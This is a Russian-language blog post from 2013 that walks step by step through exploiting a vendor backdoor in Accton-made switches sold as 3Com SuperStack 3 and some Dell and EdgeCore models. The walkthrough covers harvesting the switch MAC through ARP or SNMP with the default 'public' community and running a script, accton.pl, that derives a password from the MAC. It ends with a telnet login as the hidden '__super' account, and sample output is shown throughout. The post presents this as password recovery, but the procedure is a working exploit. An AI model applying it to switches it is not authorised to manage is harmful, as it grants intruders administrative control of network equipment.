// Июнь 17th, 2013 // No Comments » // 3Com, hack, recovery password, switch
Оказалось, что линейка свитчей 3Com SuperStack 3 (а еще и некоторые свитчи Dell, SMC, Foundry и EdgeCore) вовсе не 3Com, а Accton. В документации к бэкдору упоминаются модели 3Com 3812, 3Com 3870, Edgecore ES4649 и Dell PowerConnect 5224, я проводил эксперимент на 3Com 3226 и 3250.
Суть бэкдора в том, что производитель заложил возможность авторизоваться на свитче зная его мак, который скриптом можно превратить в пароль, естественно все работает только в том случаи если у вас есть доступ к свитчу по telnet/ssh или http.
Для начала начала, нужно раздобыть мак адрес, если свитч находится в одной L2 сети с вами достаточно сделать ping и посмотреть ARP таблицу, например так:
C:\>ping 10.28.28.28
Обмен пакетами с 10.28.28.28 по 32 байт:
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Статистика Ping для 10.28.28.28:
Пакетов: отправлено = 4, получено = 4, потеряно = 0 (0% потерь),
Приблизительное время приема-передачи в мс:
Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек
C:\>arp -a 10.28.28.28
Интерфейс: 10.28.28.28 --- 0x10005
Адрес IP Физический адрес Тип
10.28.28.28 00-12-a9-c9-ac-c0 динамический
Если свитч находится за маршрутизатором, можно попробовать достать его мак через протокол SNMP, если его администратор не отключил или не поменял комьюнити по умолчанию.
$ snmpget -v1 -c public 10.28.28.28 IF-MIB::ifPhysAddress.1001
IF-MIB::ifPhysAddress.1001 = STRING: 0:12:a9:c9:ac:c0
Скачать скрипт accton.pl
запустить скрипт и в качестве параметра указать мак, с разделителем «:»:
./accton.pl 00:12:a9:c9:ac:c0
BUvypQd!
вот собственно «BUvypQd!» и будет пароль.
Подключаемся к свитчю через telnet, вводим логин «__super» и пароль, который сгенерировал скрипт:
$ telnet 10.28.28.28
Trying 10.28.28.28...
Connected to 10.28.28.28.
Escape character is '^]'.
Login: __super
Password: BUvypQd!
Menu options: -----------3Com SuperStack 3 Switch 3226-------------------------
bridge - Administer bridge-wide parameters
feature - Administer system features
gettingStarted - Basic device configuration
logout - Logout of the Command Line Interface
physicalInterface - Administer physical interfaces
protocol - Administer protocols
security - Administer security
system - Administer system-level functions
trafficManagement - Administer traffic management
Type ? for help.
--------------------------------3Com 3226 (1)--------------------------------
Select menu option:
Ссылка на описание бэкдора http://www.exploit-db.com/exploits/14875/